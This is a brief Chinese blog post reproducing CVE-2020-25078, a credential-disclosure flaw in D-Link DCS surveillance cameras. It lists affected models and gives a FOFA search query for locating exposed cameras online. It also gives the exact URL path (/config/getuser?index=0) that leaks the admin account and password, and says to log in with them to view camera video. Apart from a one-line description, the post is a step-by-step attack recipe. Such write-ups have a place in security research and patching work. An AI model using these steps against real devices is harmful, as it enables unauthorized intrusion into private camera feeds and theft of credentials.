D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

漏洞描述

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面

漏洞影响

Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

 

FOFA

Note

app="D_Link-DCS-2530L"

 

 

 

访问登录界面

 

 

出现漏洞的 Url 为, 其中泄露了账号密码

 1 http://xxx.xxx.xxx.xxx/config/getuser?index=0 

 

 使用泄露的账号密码登陆系统

 

 

posted @ 2021-04-28 16:32  蓝银花  阅读(1568)  评论(0编辑  收藏  举报
Live2D